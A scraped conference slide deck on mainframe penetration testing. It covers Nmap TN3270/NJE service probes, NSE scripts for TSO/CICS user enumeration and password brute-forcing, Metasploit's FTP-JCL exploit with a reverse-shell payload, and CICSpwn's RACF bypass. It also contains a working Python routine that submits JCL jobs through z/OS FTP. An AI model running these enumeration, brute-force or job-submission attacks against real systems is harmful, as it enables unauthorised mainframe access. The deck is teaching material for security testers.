VANGUARD SECURITY & COMPLIANCE 2016
Philip Young
ZedSec 390
CST08
Advanced Mainframe Hacking
SECURITY & COMPLIANCE
CONFERENCE 2016
Disclaimer
I’m not here in the
name of or on behalf of
my employer. All
opinions expressed
here are my own.
About Me!
Purpose
This session will:
• Go over the tools introduced in Monday's keynote
• Explain what's going on behind the scenes
• Show you how to use the tools
Tools Covered
• Nmap
• Metasploit
• CICSpwn
• ELV.APF
Platform
• Linux (Kali Linux)
• Vmware
• macOS
• VPS
Kali Linux
• A Linux distribution
• Comes pre-loaded with multiple tools:
• Burp Suite
• Metasploit
• BeEF (Browser Exploitation Framework)
• Many more
DEMO
Nmap
• Created in 1997
• By: Fyodor
• Mostly ‘C’
• Includes Service Detection
• Added Scripting Engine in ‘07
Nmap
• Network MAP
• Uses various techniques to
discover open ports
• E.G. “Syn Scan”
Service Probes
• Identify what is running on a port
• Uses TCP/UDP probes
Nmap Probes
• Use the flag: -sV
• NULL probe: Nmap sends nothing and matches whatever the service sends first (its banner)
• Approx 4,000 match lines hang off the NULL probe
Let's look at TN3270*:
match tn3270 m|^\xff\xfd\x1d| p/IBM Telnet TN3270/ i/3270-REGIME/
* line 4606 in nmap-service-probes (as of the version used for the talk)
TN3270 Null Probe
match -> 'Match the following'
tn3270 -> 'as service tn3270'

m|^\xff\xfd\x1d| -> regular expression applied to the raw bytes received
\xff\xfd\x1d = IAC DO 3270-REGIME (Telnet option 29, 0x1d, RFC 1041; note that TN3270E is option 40, 0x28, and is negotiated later)

p/IBM Telnet TN3270/ = set the product name to 'IBM Telnet TN3270'
i/3270-REGIME/ = extra info field shown next to the version
Other Probes
• TCP Probes
• Send Data, inspect reply
• For example Network Job Entry
Probe:
NJE Probe
• Sends an invalid NJE ‘OPEN’
packet
• Waits for either ‘ACK’ or ‘NAK’ in
EBCDIC
Nmap without Service Probes
Nmap WITH Service Probes
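The two probe styles described above can be modelled without Nmap. The block below is an added example, not code from the slides or from Nmap itself: it applies a NULL-probe style match line (the tn3270 line quoted above, plus two lines constructed here for illustration) to a service banner, decodes the Telnet option negotiation those bytes represent, and checks an NJE reply for the EBCDIC ACK/NAK the NJE probe waits for. The sample banners are constructed, not captured from a live system.

```python
import re

# Telnet protocol bytes and the option numbers seen in 3270 negotiation
# (option 29 = 3270-REGIME per RFC 1041, option 40 = TN3270E per RFC 2355).
IAC, WILL, WONT, DO, DONT = 0xFF, 0xFB, 0xFC, 0xFD, 0xFE
CMD_NAMES = {WILL: "WILL", WONT: "WONT", DO: "DO", DONT: "DONT"}
OPTION_NAMES = {0x00: "BINARY", 0x18: "TERMINAL-TYPE", 0x19: "EOR",
                0x1D: "3270-REGIME", 0x28: "TN3270E"}

# Match lines in the shape of nmap-service-probes: (service, regex, product).
# The tn3270 line is the one from the slide; the other two are constructed
# here for illustration and are not copied from the nmap file.
NULL_PROBE_MATCHES = [
    ("tn3270", re.compile(rb"^\xff\xfd\x1d"), "IBM Telnet TN3270"),
    ("tn3270", re.compile(rb"^\xff\xfd\x28"), "TN3270E Telnet server"),
    ("ftp", re.compile(rb"^220[ -]"), "FTP"),
]

# What the NJE TCP probe looks for: the peer's ACK or NAK control record,
# which arrives in EBCDIC (code page 037), not ASCII.
NJE_ACK = "ACK".encode("cp037")   # b'\xc1\xc3\xd2'
NJE_NAK = "NAK".encode("cp037")   # b'\xd5\xc1\xd2'


def decode_negotiation(banner: bytes) -> list:
    """Turn the leading IAC <cmd> <opt> triplets of a banner into readable
    strings such as 'IAC DO 3270-REGIME'. Stops at the first non-IAC byte."""
    out, i = [], 0
    while i + 2 < len(banner) and banner[i] == IAC and banner[i + 1] in CMD_NAMES:
        opt = banner[i + 2]
        out.append(f"IAC {CMD_NAMES[banner[i + 1]]} {OPTION_NAMES.get(opt, str(opt))}")
        i += 3
    return out


def null_probe_match(banner: bytes):
    """First NULL-probe match line whose regex hits the banner, or None.
    As in Nmap, this is applied to what the service sent unprompted."""
    for service, rx, product in NULL_PROBE_MATCHES:
        if rx.search(banner):
            return service, product
    return None


def nje_probe_match(reply: bytes):
    """Classify the reply to an (invalid) NJE OPEN as 'ACK', 'NAK' or None.
    An ASCII 'NAK' does not count: the bytes must be EBCDIC."""
    if NJE_NAK in reply:
        return "NAK"
    if NJE_ACK in reply:
        return "ACK"
    return None


if __name__ == "__main__":
    # Constructed samples: a Telnet server opening TN3270 negotiation, and an
    # NJE node rejecting a bogus OPEN (leading bytes are filler).
    tn3270_banner = b"\xff\xfd\x1d\xff\xfd\x18\xff\xfb\x19"
    print(null_probe_match(tn3270_banner), decode_negotiation(tn3270_banner))
    print(nje_probe_match(b"\x00" * 8 + NJE_NAK))
```

The point worth noticing is the EBCDIC check: an ASCII "NAK" in a reply is not a hit, which is exactly why a generic banner grabber misses NJE and the dedicated probe finds it.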
Nmap Scripting
Engine (NSE)
• Composed of Libraries and scripts
• Over 530 scripts available
• 121 Libraries
• Uses Lua
NSE Categories
AUTH
BROADCAST
BRUTE
DEFAULT
DISCOVERY
DOS
EXPLOIT
EXTERNAL
FUZZER
INTRUSIVE
MALWARE
SAFE
VERSION
VULN
TN3270 NSE Library
• A ‘virtual’ TN3270 terminal written
in Lua
• Available: https://github.com/zedsec390/NMAP
• Allows for the following:
Invoke
• To invoke scripts use the flag --script
(\ is line continuation in Linux; the target host follows the script name)

nmap -sV \
--script tn3270-screen <target>
Additional TN3270
Scripts
• VTAM Applid Enumeration
• TSO:
• User ID Enumeration
• Password Brute Force
• CICS:
• Transaction Enumeration
• User ID Enumeration
• User Password Brute Forcing
TSO User
Enumeration
• Let's walk through the arguments:
• Note the libraries: brute & unpwdb

Argument                     Definition
brute.maxthreads=100         Max number of concurrent connections. Set to 100.
userdb='/tmp/users.txt'      File with usernames you want to test.
tso-enum.commands='TSOL5'    The command used to get to TSO.
CICS Transaction
Enumeration
Argument                       Definition
brute.maxthreads=100           Max number of concurrent connections. Set to 100.
idlist='/tmp/users.txt'        File with CICS transactions you're looking for.
cics-enum.commands='CICSTS29'  The command used to get to the CICS region.
cics-enum.path='/home/test'    Successfully identified transaction screenshots will be placed in this folder.
DEMO
Metasploit Framework
• Developed by H.D. Moore in 2003
• Moved to Ruby in 2007
• Created an easy to use exploit platform
• Chad Rikansrud (@bigendiansmalls) added JCL payloads and z/OS architecture support in 2016
Using MSF
• Run ‘msfconsole’
• To list all exploits: show exploits
• Run the only z/OS 'exploit' module (at the time of this talk):
use exploit/mainframe/ftp/ftp_jcl_creds
• Show the options with: show options
• Fill in the options you need
• Select which ‘payload’ you want to use
Set options
• Exploit options:

Option     Definition
FTPUSER    User ID to use.
FTPPASS    Password to use.
RHOST      FTP hostname/IP address of the target LPAR.
RPORT      FTP port (find it with Nmap).
Metasploit Payload
Options
Now select a payload:
set payload cmd/mainframe/reverse_shell_jcl
Change the payload options:

Option     Definition
LHOST      Our hostname or IP address.
LPORT      The port you want Metasploit to open a listener on.
DEMO
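The module name says what the exploit is: valid FTP credentials plus JCL. The z/OS FTP server exposes JES through `SITE FILETYPE=JES`, after which a STOR of a text file submits it as a job rather than writing a dataset, and the reply carries the job id. The block below is an added example, not the Metasploit module or its payload: it builds a harmless batch TSO job (the reverse_shell_jcl payload would supply a different step body), checks the JCL column rules that silently kill jobs, parses the JES reply, and wraps the submission in `ftplib`. Only the builder, checker and parser run offline; `submit_via_jes` needs a real host and is not exercised here. The account field `ACCT` and job name are placeholders.

```python
import io
import re
from ftplib import FTP

# JCL column rules: a // statement must end by column 71 (column 72 is the
# continuation column); in-stream data may use all 80 columns.
JCL_STMT_MAX = 71
JCL_DATA_MAX = 80


def build_tso_job(jobname: str, tso_commands, acct: str = "ACCT") -> str:
    """Build a job that runs TSO commands in batch under IKJEFT01.
    Metasploit's payload replaces this step body with its own JCL; this
    version just runs whatever TSO commands it is given (e.g. LISTUSER)."""
    lines = [
        f"//{jobname:<8} JOB ({acct}),'MSF TEST',CLASS=A,MSGCLASS=X,NOTIFY=&SYSUID",
        "//STEP1    EXEC PGM=IKJEFT01",
        "//SYSTSPRT DD SYSOUT=*",
        "//SYSTSIN  DD *",
    ]
    lines.extend(cmd.upper() for cmd in tso_commands)
    lines.append("/*")
    return "\n".join(lines) + "\n"


def check_jcl(jcl: str) -> list:
    """Return the problems that would make JES reject (or ignore) the job."""
    problems = []
    lines = jcl.splitlines()
    for n, line in enumerate(lines, 1):
        if line.startswith("//"):
            if len(line) > JCL_STMT_MAX:
                problems.append(f"line {n}: JCL statement exceeds column {JCL_STMT_MAX}")
        elif len(line) > JCL_DATA_MAX:
            problems.append(f"line {n}: in-stream data exceeds column {JCL_DATA_MAX}")
    first = lines[0] if lines else ""
    if not re.match(r"//(\S{1,8})\s+JOB\b", first):
        problems.append("line 1: missing or malformed JOB card (job name is 1-8 chars)")
    return problems


# JES2 job ids look like JOB12345 or, with 7-digit numbering, J0123456.
JES_JOBID_RE = re.compile(r"It is known to JES as (JOB\d{5}|J\d{7})")


def parse_jes_jobid(ftp_reply: str):
    """Pull the job id out of the STOR reply the z/OS FTP server returns
    while FILETYPE=JES is in effect; None if the submit was refused."""
    m = JES_JOBID_RE.search(ftp_reply)
    return m.group(1) if m else None


def submit_via_jes(host: str, user: str, password: str, jcl: str, port: int = 21):
    """Submit JCL through the z/OS FTP server's JES interface, the same path
    ftp_jcl_creds takes. Needs a live target; not run offline."""
    problems = check_jcl(jcl)
    if problems:
        raise ValueError("; ".join(problems))
    ftp = FTP()
    ftp.connect(host, port)
    ftp.login(user, password)
    ftp.sendcmd("SITE FILETYPE=JES")
    reply = ftp.storlines("STOR job.jcl", io.BytesIO(jcl.encode("ascii")))
    ftp.quit()
    return parse_jes_jobid(reply)


if __name__ == "__main__":
    job = build_tso_job("PENTEST", ["listuser"])
    print(job)
    print("problems:", check_jcl(job))
    # Constructed reply in the shape the z/OS FTP server uses for a JES submit.
    print(parse_jes_jobid("250-It is known to JES as JOB01234\r\n250 Transfer completed successfully."))
```

Defensively, this is also the detection hook: an FTP session that issues `SITE FILETYPE=JES` from a workstation that has no business submitting jobs, or a JOB card submitted under a user whose normal access is interactive only, is what SMF type 118/119 and JES job-start records will show.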
CICSpwn
• Released this year (2016) by Ayoub Elaassal (@ayoul3)
• Relies on CEMT/CEDA
transaction IDs (for now)
• Uses CEMT to upload and
execute JCL/REXX
• Can be used to assess CICS and
break in to environments
• Requires Python 2.7
Interesting Options
Invoke with: python cicspwn.py

Flag       Definition
-i         Gather information
-A         Test all options
-s         Upload JCL to be executed by the CICS user (requires CEMT)
--bypass   Will bypass RACF if CEDA is available
DEMO
Where To From Here?
Escalation
• So far only network based
• What happens after access is
granted?
Some Ideas
• Storage 'scrapers' to gather system information (think 'IPLINFO', but built into Metasploit)
• Automated APF tools to attempt privilege
escalation through zapping APF
authorized modules
• Data dumping tools to grab all datasets
• SMP/E corruption
Why Not?
• Make your own tools?
I'd prefer the standard tools ship with what the experts need, so testers have it without having to know about it first.
Contact:
mainframed767@gmail.com

@mainframed767
Thank you!
SECURITY & COMPLIANCE
CONFERENCE 2016

More Related Content

What's hot

Dead Lock Analysis of spin_lock() in Linux Kernel (english)
Dead Lock Analysis of spin_lock() in Linux Kernel (english)Dead Lock Analysis of spin_lock() in Linux Kernel (english)
Dead Lock Analysis of spin_lock() in Linux Kernel (english)Sneeker Yeh
 
Linux admin interview questions
Linux admin interview questionsLinux admin interview questions
Linux admin interview questionsKavya Sri
 
Deploying Privileged Access Workstations (PAWs)
Deploying Privileged Access Workstations (PAWs)Deploying Privileged Access Workstations (PAWs)
Deploying Privileged Access Workstations (PAWs)Blue Teamer
 
Docker London: Container Security
Docker London: Container SecurityDocker London: Container Security
Docker London: Container SecurityPhil Estes
 
IBM MQ and Kafka, what is the difference?
IBM MQ and Kafka, what is the difference?IBM MQ and Kafka, what is the difference?
IBM MQ and Kafka, what is the difference?David Ware
 
Linux Preempt-RT Internals
Linux Preempt-RT InternalsLinux Preempt-RT Internals
Linux Preempt-RT Internals哲豪 康哲豪
 
IT Automation with Ansible
IT Automation with AnsibleIT Automation with Ansible
IT Automation with AnsibleRayed Alrashed
 
Ansible presentation
Ansible presentationAnsible presentation
Ansible presentationSuresh Kumar
 
Ansible Introduction
Ansible Introduction Ansible Introduction
Ansible Introduction Robert Reiz
 
All about Firewalls ,IPS IDS and the era of UTM in a nutshell
All  about Firewalls ,IPS IDS and the era of UTM in a nutshellAll  about Firewalls ,IPS IDS and the era of UTM in a nutshell
All about Firewalls ,IPS IDS and the era of UTM in a nutshellHishan Shouketh
 
Vagrant 101 Workshop
Vagrant 101 WorkshopVagrant 101 Workshop
Vagrant 101 WorkshopLiora Milbaum
 
Practical API Security - PyCon 2018
Practical API Security - PyCon 2018Practical API Security - PyCon 2018
Practical API Security - PyCon 2018Adam Englander
 
FreeSWITCH Cluster by K8s
FreeSWITCH Cluster by K8sFreeSWITCH Cluster by K8s
FreeSWITCH Cluster by K8sChien Cheng Wu
 
XPDDS17: Introduction to Intel SGX and SGX Virtualization - Kai Huang, Intel
XPDDS17: Introduction to Intel SGX and SGX Virtualization - Kai Huang, IntelXPDDS17: Introduction to Intel SGX and SGX Virtualization - Kai Huang, Intel
XPDDS17: Introduction to Intel SGX and SGX Virtualization - Kai Huang, IntelThe Linux Foundation
 
Advanced performance troubleshooting using esxtop
Advanced performance troubleshooting using esxtopAdvanced performance troubleshooting using esxtop
Advanced performance troubleshooting using esxtopAlan Renouf
 
Linux Systems Performance 2016
Linux Systems Performance 2016Linux Systems Performance 2016
Linux Systems Performance 2016Brendan Gregg
 

What's hot (20)

Ansible
AnsibleAnsible
Ansible
 
Dead Lock Analysis of spin_lock() in Linux Kernel (english)
Dead Lock Analysis of spin_lock() in Linux Kernel (english)Dead Lock Analysis of spin_lock() in Linux Kernel (english)
Dead Lock Analysis of spin_lock() in Linux Kernel (english)
 
Linux admin interview questions
Linux admin interview questionsLinux admin interview questions
Linux admin interview questions
 
Deploying Privileged Access Workstations (PAWs)
Deploying Privileged Access Workstations (PAWs)Deploying Privileged Access Workstations (PAWs)
Deploying Privileged Access Workstations (PAWs)
 
Docker London: Container Security
Docker London: Container SecurityDocker London: Container Security
Docker London: Container Security
 
IBM MQ and Kafka, what is the difference?
IBM MQ and Kafka, what is the difference?IBM MQ and Kafka, what is the difference?
IBM MQ and Kafka, what is the difference?
 
Linux Preempt-RT Internals
Linux Preempt-RT InternalsLinux Preempt-RT Internals
Linux Preempt-RT Internals
 
IT Automation with Ansible
IT Automation with AnsibleIT Automation with Ansible
IT Automation with Ansible
 
Vagrant
Vagrant Vagrant
Vagrant
 
Ansible presentation
Ansible presentationAnsible presentation
Ansible presentation
 
Ansible Introduction
Ansible Introduction Ansible Introduction
Ansible Introduction
 
All about Firewalls ,IPS IDS and the era of UTM in a nutshell
All  about Firewalls ,IPS IDS and the era of UTM in a nutshellAll  about Firewalls ,IPS IDS and the era of UTM in a nutshell
All about Firewalls ,IPS IDS and the era of UTM in a nutshell
 
Kubernetes 101 and Fun
Kubernetes 101 and FunKubernetes 101 and Fun
Kubernetes 101 and Fun
 
Vagrant 101 Workshop
Vagrant 101 WorkshopVagrant 101 Workshop
Vagrant 101 Workshop
 
Practical API Security - PyCon 2018
Practical API Security - PyCon 2018Practical API Security - PyCon 2018
Practical API Security - PyCon 2018
 
FreeSWITCH Cluster by K8s
FreeSWITCH Cluster by K8sFreeSWITCH Cluster by K8s
FreeSWITCH Cluster by K8s
 
XPDDS17: Introduction to Intel SGX and SGX Virtualization - Kai Huang, Intel
XPDDS17: Introduction to Intel SGX and SGX Virtualization - Kai Huang, IntelXPDDS17: Introduction to Intel SGX and SGX Virtualization - Kai Huang, Intel
XPDDS17: Introduction to Intel SGX and SGX Virtualization - Kai Huang, Intel
 
Advanced performance troubleshooting using esxtop
Advanced performance troubleshooting using esxtopAdvanced performance troubleshooting using esxtop
Advanced performance troubleshooting using esxtop
 
Ansible
AnsibleAnsible
Ansible
 
Linux Systems Performance 2016
Linux Systems Performance 2016Linux Systems Performance 2016
Linux Systems Performance 2016
 

Similar to Advanced mainframe hacking

MongoDB World 2018: Enterprise Security in the Cloud
MongoDB World 2018: Enterprise Security in the CloudMongoDB World 2018: Enterprise Security in the Cloud
MongoDB World 2018: Enterprise Security in the CloudMongoDB
 
MongoDB World 2018: Enterprise Cloud Security
MongoDB World 2018: Enterprise Cloud SecurityMongoDB World 2018: Enterprise Cloud Security
MongoDB World 2018: Enterprise Cloud SecurityMongoDB
 
DEF CON 23 - CASSIDY LEVERETT LEE - switches get stitches
DEF CON 23 - CASSIDY LEVERETT LEE - switches get stitchesDEF CON 23 - CASSIDY LEVERETT LEE - switches get stitches
DEF CON 23 - CASSIDY LEVERETT LEE - switches get stitchesFelipe Prado
 
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2Chris Gates
 
AWS re:Invent 2016: 5 Security Automation Improvements You Can Make by Using ...
AWS re:Invent 2016: 5 Security Automation Improvements You Can Make by Using ...AWS re:Invent 2016: 5 Security Automation Improvements You Can Make by Using ...
AWS re:Invent 2016: 5 Security Automation Improvements You Can Make by Using ...Amazon Web Services
 
Justin Fox_NuData Security_A Master_Card_Company_June 9 2017_presentation
Justin Fox_NuData Security_A Master_Card_Company_June 9 2017_presentationJustin Fox_NuData Security_A Master_Card_Company_June 9 2017_presentation
Justin Fox_NuData Security_A Master_Card_Company_June 9 2017_presentationTriNimbus
 
Compliance as Code - Using the Open Source InSpec testing Framework
Compliance as Code - Using the Open Source InSpec testing FrameworkCompliance as Code - Using the Open Source InSpec testing Framework
Compliance as Code - Using the Open Source InSpec testing FrameworkSonatype
 
Securing the cloud
Securing the cloudSecuring the cloud
Securing the cloudZIONSECURITY
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Rob Fuller
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Chris Gates
 
ASA Firepower NGFW Update and Deployment Scenarios
ASA Firepower NGFW Update and Deployment ScenariosASA Firepower NGFW Update and Deployment Scenarios
ASA Firepower NGFW Update and Deployment ScenariosCisco Canada
 
Splunk Enterprise for InfoSec Hands-On Breakout Session
Splunk Enterprise for InfoSec Hands-On Breakout SessionSplunk Enterprise for InfoSec Hands-On Breakout Session
Splunk Enterprise for InfoSec Hands-On Breakout SessionSplunk
 
Monitoring as Code: Getting to Monitoring-Driven Development - DEV314 - re:In...
Monitoring as Code: Getting to Monitoring-Driven Development - DEV314 - re:In...Monitoring as Code: Getting to Monitoring-Driven Development - DEV314 - re:In...
Monitoring as Code: Getting to Monitoring-Driven Development - DEV314 - re:In...Amazon Web Services
 
Don’t Get Stuck in The Encryption Stone Age: Get Decrypted Visibility with Am...
Don’t Get Stuck in The Encryption Stone Age: Get Decrypted Visibility with Am...Don’t Get Stuck in The Encryption Stone Age: Get Decrypted Visibility with Am...
Don’t Get Stuck in The Encryption Stone Age: Get Decrypted Visibility with Am...SBWebinars
 
OSMC 2023 | Replacing NSClient++ for Windows Monitoring by Sven Nielein
OSMC 2023 | Replacing NSClient++ for Windows Monitoring by Sven NieleinOSMC 2023 | Replacing NSClient++ for Windows Monitoring by Sven Nielein
OSMC 2023 | Replacing NSClient++ for Windows Monitoring by Sven NieleinNETWAYS
 
SNClient+ - General purpose monitoring agent
SNClient+ - General purpose monitoring agentSNClient+ - General purpose monitoring agent
SNClient+ - General purpose monitoring agentSven Nierlein
 
BSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysBSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysJoff Thyer
 
DEFCON 23 - Nir Valtman and Moshe Ferber - from zero to secure in 1
DEFCON 23 - Nir Valtman and  Moshe Ferber - from zero to secure in 1DEFCON 23 - Nir Valtman and  Moshe Ferber - from zero to secure in 1
DEFCON 23 - Nir Valtman and Moshe Ferber - from zero to secure in 1Felipe Prado
 
Serverless Security: What's Left to Protect?
Serverless Security: What's Left to Protect?Serverless Security: What's Left to Protect?
Serverless Security: What's Left to Protect?Guy Podjarny
 

Similar to Advanced mainframe hacking (20)

MongoDB World 2018: Enterprise Security in the Cloud
MongoDB World 2018: Enterprise Security in the CloudMongoDB World 2018: Enterprise Security in the Cloud
MongoDB World 2018: Enterprise Security in the Cloud
 
MongoDB World 2018: Enterprise Cloud Security
MongoDB World 2018: Enterprise Cloud SecurityMongoDB World 2018: Enterprise Cloud Security
MongoDB World 2018: Enterprise Cloud Security
 
DEF CON 23 - CASSIDY LEVERETT LEE - switches get stitches
DEF CON 23 - CASSIDY LEVERETT LEE - switches get stitchesDEF CON 23 - CASSIDY LEVERETT LEE - switches get stitches
DEF CON 23 - CASSIDY LEVERETT LEE - switches get stitches
 
Miranda
MirandaMiranda
Miranda
 
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
 
AWS re:Invent 2016: 5 Security Automation Improvements You Can Make by Using ...
AWS re:Invent 2016: 5 Security Automation Improvements You Can Make by Using ...AWS re:Invent 2016: 5 Security Automation Improvements You Can Make by Using ...
AWS re:Invent 2016: 5 Security Automation Improvements You Can Make by Using ...
 
Justin Fox_NuData Security_A Master_Card_Company_June 9 2017_presentation
Justin Fox_NuData Security_A Master_Card_Company_June 9 2017_presentationJustin Fox_NuData Security_A Master_Card_Company_June 9 2017_presentation
Justin Fox_NuData Security_A Master_Card_Company_June 9 2017_presentation
 
Compliance as Code - Using the Open Source InSpec testing Framework
Compliance as Code - Using the Open Source InSpec testing FrameworkCompliance as Code - Using the Open Source InSpec testing Framework
Compliance as Code - Using the Open Source InSpec testing Framework
 
Securing the cloud
Securing the cloudSecuring the cloud
Securing the cloud
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
 
ASA Firepower NGFW Update and Deployment Scenarios
ASA Firepower NGFW Update and Deployment ScenariosASA Firepower NGFW Update and Deployment Scenarios
ASA Firepower NGFW Update and Deployment Scenarios
 
Splunk Enterprise for InfoSec Hands-On Breakout Session
Splunk Enterprise for InfoSec Hands-On Breakout SessionSplunk Enterprise for InfoSec Hands-On Breakout Session
Splunk Enterprise for InfoSec Hands-On Breakout Session
 
Monitoring as Code: Getting to Monitoring-Driven Development - DEV314 - re:In...
Monitoring as Code: Getting to Monitoring-Driven Development - DEV314 - re:In...Monitoring as Code: Getting to Monitoring-Driven Development - DEV314 - re:In...
Monitoring as Code: Getting to Monitoring-Driven Development - DEV314 - re:In...
 
Don’t Get Stuck in The Encryption Stone Age: Get Decrypted Visibility with Am...
Don’t Get Stuck in The Encryption Stone Age: Get Decrypted Visibility with Am...Don’t Get Stuck in The Encryption Stone Age: Get Decrypted Visibility with Am...
Don’t Get Stuck in The Encryption Stone Age: Get Decrypted Visibility with Am...
 
OSMC 2023 | Replacing NSClient++ for Windows Monitoring by Sven Nielein
OSMC 2023 | Replacing NSClient++ for Windows Monitoring by Sven NieleinOSMC 2023 | Replacing NSClient++ for Windows Monitoring by Sven Nielein
OSMC 2023 | Replacing NSClient++ for Windows Monitoring by Sven Nielein
 
SNClient+ - General purpose monitoring agent
SNClient+ - General purpose monitoring agentSNClient+ - General purpose monitoring agent
SNClient+ - General purpose monitoring agent
 
BSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysBSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad Guys
 
DEFCON 23 - Nir Valtman and Moshe Ferber - from zero to secure in 1
DEFCON 23 - Nir Valtman and  Moshe Ferber - from zero to secure in 1DEFCON 23 - Nir Valtman and  Moshe Ferber - from zero to secure in 1
DEFCON 23 - Nir Valtman and Moshe Ferber - from zero to secure in 1
 
Serverless Security: What's Left to Protect?
Serverless Security: What's Left to Protect?Serverless Security: What's Left to Protect?
Serverless Security: What's Left to Protect?
 

Recently uploaded

[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdfSandro Moreira
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businesspanagenda
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAndrey Devyatkin
 
TEST BANK For Principles of Anatomy and Physiology, 16th Edition by Gerard J....
TEST BANK For Principles of Anatomy and Physiology, 16th Edition by Gerard J....TEST BANK For Principles of Anatomy and Physiology, 16th Edition by Gerard J....
TEST BANK For Principles of Anatomy and Physiology, 16th Edition by Gerard J....rightmanforbloodline
 
DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDropbox
 
Six Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal OntologySix Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal Ontologyjohnbeverley2021
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Victor Rentea
 
AI in Action: Real World Use Cases by Anitaraj
AI in Action: Real World Use Cases by AnitarajAI in Action: Real World Use Cases by Anitaraj
AI in Action: Real World Use Cases by AnitarajAnitaRaj43
 
Platformless Horizons for Digital Adaptability
Platformless Horizons for Digital AdaptabilityPlatformless Horizons for Digital Adaptability
Platformless Horizons for Digital AdaptabilityWSO2
 
Exploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with MilvusExploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with MilvusZilliz
 
Introduction to use of FHIR Documents in ABDM
Introduction to use of FHIR Documents in ABDMIntroduction to use of FHIR Documents in ABDM
Introduction to use of FHIR Documents in ABDMKumar Satyam
 
ChatGPT and Beyond - Elevating DevOps Productivity
ChatGPT and Beyond - Elevating DevOps ProductivityChatGPT and Beyond - Elevating DevOps Productivity
ChatGPT and Beyond - Elevating DevOps ProductivityVictorSzoltysek
 
WSO2 Micro Integrator for Enterprise Integration in a Decentralized, Microser...
WSO2 Micro Integrator for Enterprise Integration in a Decentralized, Microser...WSO2 Micro Integrator for Enterprise Integration in a Decentralized, Microser...
WSO2 Micro Integrator for Enterprise Integration in a Decentralized, Microser...WSO2
 
How to Check CNIC Information Online with Pakdata cf
How to Check CNIC Information Online with Pakdata cfHow to Check CNIC Information Online with Pakdata cf
How to Check CNIC Information Online with Pakdata cfdanishmna97
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc
 
JohnPollard-hybrid-app-RailsConf2024.pptx
JohnPollard-hybrid-app-RailsConf2024.pptxJohnPollard-hybrid-app-RailsConf2024.pptx
JohnPollard-hybrid-app-RailsConf2024.pptxJohnPollard37
 
Vector Search -An Introduction in Oracle Database 23ai.pptx
Vector Search -An Introduction in Oracle Database 23ai.pptxVector Search -An Introduction in Oracle Database 23ai.pptx
Vector Search -An Introduction in Oracle Database 23ai.pptxRemote DBA Services
 
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...Zilliz
 
The Zero-ETL Approach: Enhancing Data Agility and Insight
The Zero-ETL Approach: Enhancing Data Agility and InsightThe Zero-ETL Approach: Enhancing Data Agility and Insight
The Zero-ETL Approach: Enhancing Data Agility and InsightSafe Software
 
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...TrustArc
 

Recently uploaded (20)

[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
 
AWS Community Day CPH - Three problems of Terraform
